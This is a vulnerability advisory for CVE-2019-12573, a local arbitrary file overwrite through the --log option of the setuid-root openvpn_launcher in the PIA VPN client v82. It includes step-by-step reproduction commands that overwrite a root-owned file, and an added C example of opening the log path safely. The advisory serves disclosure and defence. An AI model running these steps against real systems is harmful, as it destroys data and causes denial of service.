ASA-2019-00379 – London Trust Media Private Internet Access: Arbitrary File Overwrite


Allele Security Alert

ASA-2019-00379

Identifier(s)

ASA-2019-00379, CVE-2019-12573

Title

Arbitrary File Overwrite

Vendor(s)

London Trust Media Private

Product(s)

Private Internet Access (PIA) VPN Client for Linux and macOS

Affected version(s)

Private Internet Access (PIA) VPN Client for Linux and macOS version v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for Linux and macOS v1.2.1 or later

Proof of concept

Unknown

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files.

Technical details

The PIA Linux and macOS openvpn_launcher binary is setuid root. This binary supports the --log option, which accepts a path as an argument. The --log parameter is not sanitized, which allows a local unprivileged user to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
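One way a setuid-root program can handle a caller-supplied log path safely, as an added example (not PIA's code and not the vendor's actual fix): open the file with the invoking user's credentials so the kernel enforces that user's permissions. The helper name open_log_as_invoker is hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, for contrast: a setuid-root process opens the
 * caller-supplied path while its effective uid is still 0. */

/* Hypothetical helper: open the log path with the invoking user's
 * credentials. Returns an fd, or -1 with errno set. */
int open_log_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    struct stat st;
    int fd, err = 0;

    /* Drop the group first: once euid is non-root, egid cannot change. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;

    /* The kernel now checks the real user's permissions. O_NOFOLLOW
     * refuses a symlink as the final component (ELOOP); O_NONBLOCK keeps
     * a FIFO from stalling the open. No O_TRUNC: existing data stays. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW |
                    O_NONBLOCK | O_CLOEXEC, 0600);
    if (fd < 0)
        err = errno;
    else if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        err = EINVAL;              /* only regular files are accepted */
        close(fd);
        fd = -1;
    }

    /* Regain the saved ids in reverse order; treat failure as fatal. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = argc > 1 ? open_log_as_invoker(argv[1]) : -1;
    return fd >= 0 ? close(fd) : 1;
}
```

When the binary is installed setuid root and run by an unprivileged user, a path such as the root-owned /etc/test.txt from the steps below fails with EACCES instead of being overwritten.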

Steps to reproduce

Step 1 – Create a root owned test file. For this PoC /etc/test.txt is used.

# As root
echo "this is a test" > /etc/test.txt
chmod 600 /etc/test.txt

Step 2 – Overwrite the file using the --log option as a non-privileged user.

# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt

# Linux
/opt/pia/openvpn_launcher.64 --log /etc/test.txt

Step 3 – Verify the file contents have been overwritten

# As root
cat /etc/test.txt

Credits

Rich Mirch

Reference(s)

PIA Linux, macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12573.txt

CVE-2019-12573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12573

CVE-2019-12573
https://nvd.nist.gov/vuln/detail/CVE-2019-12573

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.